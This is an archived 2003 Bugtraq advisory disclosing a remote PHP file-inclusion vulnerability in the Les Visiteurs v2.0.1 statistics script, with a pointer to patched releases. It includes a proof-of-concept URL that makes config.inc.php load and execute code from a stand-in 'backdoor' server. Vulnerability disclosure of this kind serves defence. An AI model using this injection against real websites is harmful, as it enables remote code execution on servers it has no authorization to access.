Les Visiteurs v2.0.1 code injection vulnerability
From: Matthieu Peschaud (bugtrack_at_chezwam.net)
Date: 10/26/03
- Previous message: Dan Searle: "Re: CensorNet: Cross Site Scripting Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 26 Oct 2003 01:45:52 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
Les Visiteurs is a great statistics script written in php.
It gives you some graphicals informations on visitors of
your website.
This script was distributed by phpinfo.net but is no more
maintained since a year.
---------
In this version severals unprotected includes can be found
in files:
- include/config.inc.php
- include/new-visitor.inc.php
It is possible to include a php file from a backdoor server,
and execute it on the target's server.
You just have to create on the backdoor srv these files:
- lang/<lang>.inc.php
- db/db_mysql.inc.php
fill one with something like:
<?
echo '<?
echo "<br><br>included from backdoor server :p<br>";
?>';
?>
and call an url as:
http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
---------
Because the script is not maintained and will not be patched,
i make some tarballs with a patched version.
You will find it at this url:
http://chezwam.net/main/publications/lesvisiteurs/
Matthieu Peschaud
Epita - France
- Previous message: Dan Searle: "Re: CensorNet: Cross Site Scripting Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
